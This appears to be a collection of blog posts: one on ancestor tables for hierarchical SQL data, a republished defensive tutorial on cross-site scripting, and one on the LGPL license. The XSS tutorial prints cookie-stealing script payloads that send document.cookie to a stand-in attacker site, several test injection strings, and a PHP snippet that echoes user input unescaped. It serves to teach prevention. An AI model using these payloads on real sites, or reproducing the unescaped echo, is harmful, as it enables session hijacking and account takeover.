Storing hierarchical data in a database using ancestor tables

More of a ‘programmy’ topic today – this one about storing hierarchical data (data that could represent a tree) as records in a relational database.

There’s plenty of information on the web about storing hierarchical data in SQL using these methods:

  • Adjacency list
  • Materialised paths
  • Nested sets

The method I used in a personal project of mine, however, is different to all of these.  Today I found this Evolt article, which pretty much describes the technique I’m using, calling it ancestor tables.

I don’t know if it’s just because I don’t know the right name for it, or if people just generally haven’t thought of it, but finding anybody using this method has been pretty difficult – for whatever reason, nested sets (which I believe has serious flaws) and materialised paths seem to be all the rage instead.

First, I’ll describe each of the alternative methods in brief.  More information is available in this article from DBAzine, though you can find an easier to understand description of nested sets in this one from MySQL.

Brief descriptions

An adjacency list just means that for each node, you also store the ID of its parent node.  It’s easy to write a query to find immediate parents or children of an node using this method, but finding a list of ascendents of descendents, including non-immediate ones, requires some sort of fancy recursion.  That’s a well acknowledged limitation of this method, and if you look around the web you’ll find a lot of people pointing this out, at the same time singing the praises of nested sets as if they’re the only alternative.

A materialised path means that for each node, you store a string which represents the path to that node.  For instance, the node with id 13 might have a path of ‘1.2.12’, meaning that it is the immediate child of 12, which is the child of 2, which is the child of 1.  This opens up a few more possibilities in terms of efficient queries that can be made.  For example, you can easily find all descendents of an node using a WHERE path LIKE ‘1.2.%’ type of syntax, or just WHERE path=’1.2′ if you only want immediate children.  Efficiently finding ancestors is still a bit fiddly, as is moving an node to elsewhere in the table, but it’s not unmanageable.  I actually think it’s a good solution.

Nested sets are more complicated than any other method.  For each node, you store two integers, which represent a ‘range’.  The ‘root’ node of the tree contains the lowest and highest numbers of the whole tree, and each branch contains the lowest and highest number of that branch.  It’s probably easiest to illustrate this with a diagram (which I found in this article).  Each number between the lowest and highest is used once and only once in the whole tree.  The major benefit to this is that it makes finding all descendents of a node fairly efficient.  To find children of an node, just find all nodes WHERE leftvalue > parent.leftvalue AND rightvalue < parent.rightvalue.  It’s highly inefficient, however, when you only want immediate children, ie only a single level of descendents.  It also lets you down substancially when making any modification to any node in the tree; any creation, deletion or moving of an node will always require, on average, half of the rows in the whole table to be updated.  Good if the tree is very small or you never plan to update it; bad otherwise.

Variations of nested sets exist which attempt to solve some of its problems, but these tend come at the cost of even greater complexity.  I was reading about a method with ever decreasing fractions for increasing levels of the tree earlier.

Ancestor tables

My ancestor tables method can probably be thought of as similar to a materialised path, in that it requires about the same amount of information, except that it doesn’t concatenate it all together into a string to be stored in a single column value, but represents each ancestor in its own row in a separate relation table:

  • ancestor_ID (int)
  • node_ID (int)
  • level (int)

For each node added to the tree, you add rows to this ancestor table describing its ancestry.  So for example, if node 13 is the child of 12, which is the child of 2, which is the child of 1, this would be represented in the ancestor table as:

ancestor_ID node_ID level
1 13 3
2 13 2
12 13 1

The total number of rows needed in this ancestor table is related to the number of ancestor-descendent relationships in the whole tree.  If your average node is nested only 4 levels away from the root node, then you only need about 4 times the number of nodes.  It’s much less even than O(n log n).

(When I do it, I also includes a 0th level for each node, where ancestor_ID equals node_ID and level is 0.  There was only one edge case where this helped me for my specific project.)

The method allows for all of the following queries to be efficient, requiring no recursive joins or multiple queries.

  • Find the parent of a node:
    SELECT ancestor_ID FROM ancestors WHERE node_ID=<nodeid> AND level=1
  • Find all ancestors of its node, including its parent, and each parent in turn:
    SELECT ancestor_ID FROM ancestors WHERE node_ID=<nodeid>
  • Find all the immediate children of a node:
    SELECT node_ID FROM ancestors WHERE ancestor_ID=<nodeid> AND level=1
  • Find all the descendents of a node, including all immediate children and their descendents:
    SELECT node_ID FROM ancestors WHERE ancestor_ID=<nodeid>

As you can see, none of these queries need recursive joins, or require the database to inspect more rows than they need to, and none of them even require looking up certain information (such as the path to the requested node, or left and right values) before actually doing the query that returns the rows.

Add a LEFT OUTER JOIN to your main node table, and you can fetch all the necessary data about each node (name, properties, etc) in the one query.

You can even do efficient sorting via the same index used to fetch the rows, as long as you add columns to the ancestor tables for whatever data you want to sort on and use indexes wisely.

It also means that when inserting a new node, or making another edit to the tree, you do not have to modify the majority of the tree – only the entries in the ancestor tables that belong to that node.  This is similar to the materialised paths technique, where you only need to update the path for the node you change.

Cross-site scripting could make you lose your cookies

The following article was originally written in July 2005 and published on SitePoint.com, and is republished with permission.  For securing your web application you should probably also read about CSRF and clickjacking.

Cross-site scripting (XSS) is a form of security exploit that threatens any web application. In the past, its severity has tended to be underestimated. The problems go far beyond annoyances and practical jokes perpetuated by script kiddies. By stealing your cookies, Cross-site scripting attacks can allow attackers to gain administrative access to your web application.

How does it come about? The problem forms when a web application (such as a PHP script) displays user-submitted content without filtering and/or escaping it properly. If a user submits a guestbook entry, a blog comment, or even a username and password, that content could contain any character, including characters such as <, &, or which have a different, and special, meaning when they appear as part of HTML.  If the same guestbook entry, blog comment or username field is saved by the web application and later displayed as part of a web page, without any intervening filtering or escaping, then any incidental < characters, which in a plain text field should have no special significance, will be interpreted by browsers as HTML tags.   Any user who happened to slip the character sequence <script into such a field may be able to cause Javascript code to run in the browsers of other people who view the page.

This code may either be relatively harmless – for example, creating unwanted popups or spam – or malicious – code that is intended to gain private information in order to break into each user’s account on the system.

Although cross-site scripting often involves the insertion of a <script> tag into a web page, it is possible to do some damage with other code.  There are many ways to run Javascript in a browser other than through the use of a <script> tag, as well as many other forms of active content besides Javascript.  The XSS cheat sheet is the most thorough list of XSS attack vectors I know of, and show various methods of obfuscating or encoding XSS that may be used other than <script> tags.

Relatively harmless uses of Cross Site Scripting:

  • Code intended to disrupt the layout or appearance of a web page.
  • Scripts, applets or objects intended as a practical joke, displaying annoying messages or popups.
  • Code intended to launch unwanted popup windows for advertising or shock value.

Some more harmful uses of Cross Site Scripting:

  • Scripts, including Javascript or another form of active content, designed to collect private information from cookies and transmit it to a third party website in order to gain administrator access to the system.
  • Objects or applets intended to exploit a known security vulnerability in a particular browser.

Life cycle of a cross-site scripting exploit

I find that cross-site scripting can be a difficult concept to picture. I’ll lead you through a typical cross-site scripting scenario, to gives some examples of what is possible.

Joe has built himself a custom CMS complete with user accounts, sessions and different access levels for different users. To log into his CMS, he enters a username and password into a login form on the site. For the duration of his browser session, a cookie stores his ’session ID’ which allows him to remain logged-in while navigating around the site.

Joe’s website also allows any user to sign up for a new account, and place a ‘message’ onto the Website. For example, a message can be placed in a blog comment, or in the user’s profile, or even the user’s username. Unfortunately, Joe forgot to use htmlspecialchars or an equivalent to escape plain text in HTML in some places where he echoes user-submitted content to the browser.

A malicious user, Rick, signs up at Joe’s website and fills out his new profile page. In his user profile, he includes the text:

<script>alert('Hello World');</script>

Now, whenever Joe (or anybody else) views Rick’s user profile, he gets an annoying JavaScript popup taunting him.

Rick gets a little craftier and places the following code into a guestbook entry of Joe’s page:

<script>location.replace('http://rickspage.com/?secret='+document.cookie)</script>

Now, whenever Joe (or anybody else) views the guestbook, he will be redirected to a page on Rick’s site. What’s more, the cookie from Joe’s browser session has been transmitted to Rick’s web server as part of the URL.

Rick now uses the cookie from Joe’s browser session to browse Joe’s CMS using Joe’s account. Rick may even be able to change Joe’s password, give himself administrator access, or start deleting content.

Rick gained administrator access to Joe’s CMS by placing a <script> tag into Joe’s guestbook. What we are dealing with here is session hijacking – stealing the session ID (which is often stored in a cookie) from another user in order to impersonate them on the system.  XSS is a way for an attacker to obtain access to sessions on another server.

Rick could have used other methods to achieve the same result. For instance, Rick could have used a JavaScript link to trick Joe into sending the very same information to his server:

<a href="javascript:location.replace('http://rickspage.com/?secret='+document.cookie)">
A web page about dogs</a>

If Joe clicked that link, as he may do without even thinking, his session ID would be transmitted to Rick’s server.

Furthermore, Rick could have embedded his JavaScript into event handler attributes such as onclick, onmousemove and onsubmit – the latter which could be used to modify the behaviour of a form on the site.

Rick could also have tried using tools other than JavaScript – such as ActiveX controls or applets.

Patch those holes

Below are some steps which you can take to help prevent cross-site-scripting attacks from being used on your PHP application, and to limit the amount of damage that can be done in the event that someone finds a way anyhow.

Whenever displaying plain text content on your web site, escape the plain text string before doing so.  In PHP, a simple way to do this is to use the htmlspecialchars function on the data right before. This includes all plain text data, whether it be user-submitted or not.  The idea is that < and & characters need to be escaped whether their use is malicious or not.

You may be displaying unfiltered user-submitted content where you don’t realise it. For example, the following is dangerous.

if (strlen($_GET['username']) > 12)
  exit("Error: {$_GET['username']} is too long. Your username may be no more than 12 characters");

In this case, the user variable “username” is being sent to the browser without being escaped. A user could construct a URL similar to the following and trick people into clicking it:

http://www.example.com/register.php?username=%3Cscript%3Ealert('gotcha')%3B%3C%2Fscript%3E

The JavaScript above is harmless, but could be modified to steal information from cookies and transmit it to a third party.  Notice that here, the <script> tag is URL encoded.  This will automatically be decoded by the server.

You can also reduce the amount of damage that could be done if a user does hijack a user session. When designing your CMS, do not rely entirely on cookies for user authentication.  Cookies are an excellent convenience feature for users, so their use is encourage, but there are some highly important tasks that may call for more protection.  In addition to the cookie, users should also be asked for their password when they undertake activities such as changing their (or anybody else’s) password or escalating their privilege level. So, if your session is hijacked using your session ID, the attacker won’t be able to lock the rightful account owner out of the account or retain control over the account after they leave. Reducing the risk in the case of an attack, however, should be a secondary priority to preventing an attack in the first place.

What if you want your users to be allowed to submit HTML?

Escaping plain text for output is easy.  All that needs to be done is to replace a small set of special characters with their escaped equivalents in HTML.

However, if a web application allows users to submit actual HTML (say, from a rich text editing control, or even prompting the user to type HTML in manually), then filtering this for safe output on a web page becomes much harder.  Filtering HTML cannot be reliably done with a search and replace statement or two, or even a highly complex regular expression.  Any filter would need to be able to interpret the HTML in the same way that a browser – any browser – might, and browsers do some strange things.

A common compromise, as seen on many blogs, is to allow only a small subset of HTML.  This makes filtering considerably more attainable than otherwise, but by no means simple.  A read through of the XSS cheat sheet will reveal the necessary complexity of any required filtering mechanism.  What’s more, new methods of defeating XSS filters are discovered all the time (and may be added to the XSS cheat sheet at a later date).

I myself have written a rather comprehensive HTML and XHTML filter in PHP, and it consists of 3 files of source code with over 2000 lines of code in total, not including DTDs.  It is capable of understanding the entire HTML language in terms of its DTD.  To say it is complicated is an understatement, and it still has its limitations.  If you wanted to go down that path you could use HTML Tidy, I presume, incorporated with your own filtering code to make the filtering part a bit easier.

Testing for cross-site scripting vulnerabilities in your application

A way to test for Cross Site Scripting vulnerabilities is to insert testing code into every field, and every variable passed on the query string, that you can find in your application.

The XSS cheat sheet that I mentioned above is the best source of XSS testing code that I know of.

Try, for example, inserting the following code where you would like to test.

<script>alert('Hello World!');</script>

Then, visit your blog to see what the comment looks like. If you see the code as you submitted it, your application handled it correctly. If your comment is blank, and you see a JavaScript popup, your application is vulnerable.

It’s important to not just test the obvious places where users can submit content. Think outside the square. For example, you display usernames all over the place – could a user possibly embed HTML or JavaScript into a username? What about user signatures? Secret questions and answers?

Cross Site Scripting can even be a problem in situations where HTML is filtered out of user-submitted content but another markup language is used.

Forum code or “BBcode”:

[url=javascript:alert('Yes');]Are you vulnerable?[/url]

Wiki markup:

[javascript:alert("Yes");|Are you vulnerable?]

Is your forum or wiki vulnerable?

The above two exploits (for bulletin boards and Wikis) require an unsuspecting user to actually click the link in order for the script to be executed. Interestingly, when I first wrote this article, I was surprised to find that a wiki I used at work was vulnerable to this. If anybody is tricked into clicking a link, any JavaScript in that link will run.

More information about cross-site scripting is available in this CERT Advisory and this document from Apache. The Apache document points out, rightly, that the name “Cross-site scripting” is a misleading term, since the attacks need not involve scripting, and they need not even be across sites. Previously at SitePoint, Harry talked about Handling Content From Strangers, which gives some more information on how you can protect your application from exploits.

Have a look at this very thorough article by Chris Shiflett on preventing cross-site scripting attacks.

Cross-site scripting is only one possible form of remote attack on a web application. It is probably one of the most common vulnerabilities in web applications.  However, other common vulnerabilities such as CSRF, including Login CSRF (PDF), and clickjacking, are just as serious.

Looking at the LGPL license

The Lesser General Public License (LGPL) is a software license that is based on the GPL, but is more permissive.

I have seen the GPL software license described as a cancer before,  and this analogy does indeed hold, even though it misses the point.  If you want to borrow any code released as “GPL” for use in your own source code, any of your own code that the GPL is mixed with will also need to become GPL if ever you plan on distributing software.  However, this rule of the GPL is actually a very good thing, especially for hard working open source developers, because it ensures that their work can never be exploited by companies wishing to make a buck, unless those companies give their contributions to the code back under the same license, effectively becoming part of the same open source development effort.

The LGPL is mostly the same as the GPL except that it releases some of these restrictions.  I am not a law expert, but I have come to the following understanding.  In particular, it allows for code to be combined in the same project with code from any other license including proprietary licenses, under certain conditions.  If the whole thing, including the LGPL code as well as the other code, is distributed together, then it becomes known as a ‘combined work’ under the terminology of the LGPL.  The distribution must abide by the following (a complete list exists in the text of the license under ‘Combined Works’):

  • There must be some sort of clear separation between the LGPL code and the other code.  In particular, it must be possible for the recipient to modify the LGPL code or even completely replace it with other code, such as a modified version or later version of the libary.  Therefore, if it is a compiled program, then the LGPL code must either be dynamically linked (like, a separate DLL or shared file) such that it could easily be substituted for a similar library and still be interoperable; or, if it is statically linked, the minimum required source files and/or object files must be provided, to allow recompiling with an alternative library.  The non-LGPL portion may not contain any part of the LGPL code except for very simple header files.
  • It must be clearly pointed out which part of the code is LGPL covered, including its original copyright notice and the text of the LGPL (including the GPL on which it is based).
  • If the combined software displays copyright notices during the course of running, then the copyright notice for the LGPL covered portion must also appear here, along with a link to the LGPL and GPL.
  • In some cases, you would need to provide installation information detailing how to use a modified version of the LGPLd code in the combined application.

The above is just a list of stuff that you have to do if you are going to redistribute some LGPL code as part of your non-LGPL application.  However, the text of the LGPL doesn’t really explain the benefits, or what opportunities it opens up to you.  If you are distributing a combined work which consists of both someone else’s LGPL code, and other code that is under a different license, you benefit from:

  • You don’t need to release source code for the rest of your application (ie, the non-LGPL part).  The only exception to this being as described above – if it’s all statically linked then you’d need to provide just enough code (and/or object files) to be able re-link it with an alternative or modified version of the LGPL code.  If you are linking dynamically and interacting over a normal API, you don’t need to worry about that.
  • You don’t need to release the rest of your application under the GPL.  You can use any license you want, including more restrictive proprietary licenses, provided that when you do distribute it you follow the rules.
  • Unlike GPL version 3, which prohibits using the code if you are implementing copy protection or DRM software, you can use LGPL version 3 licensed code in an application which includes copy protection or DRM.

So, LGPL is a fairly permissive license in comparison to the GPL, which cannot be ‘combined’ with other proprietary licenses in this way.  So, what can’t you do with LGPL?  Well, apart from relaxed rules such as those already discussed, LGPL still contains all of the other restrictions of the GPL.  I won’t go into all of the detail of the GPL here, but here are some of the restrictions that you still retain when using the LGPL, that you may not retain with an even more permissive license (such as a BSD or X11 license):

  • Anybody wishing to modify and redistribute LGPL code must also make the source code of the LGPL code, including their modifications, available and licensed under the LGPL.  Therefore, the open source community and the original author can still benefit if a commercial enterprise contributes improvements to the LGPL code.
  • All existing copyright notices in the LGPL code, as well as the GPL and LGPL licenses themselves, must be prominently displayed in any redistribution.  In addition to this, any application using the LGPL code must display such copyright notices and refer to the license whereever they display their own copyright notices.

Something else of note is that whether you are building software that relies on either GPL or LGPL code, if you distribute that software without any of the GPL or LGPL included (ie, the user needs to download and install it themselves),  then it’s not considered a ‘combined work’ and you don’t need to worry about complying with any terms.  However, if you include even so much as a header file from the GPL or LGPL code in your software, then you’ll be bound by the license terms of the GPL or LGPL.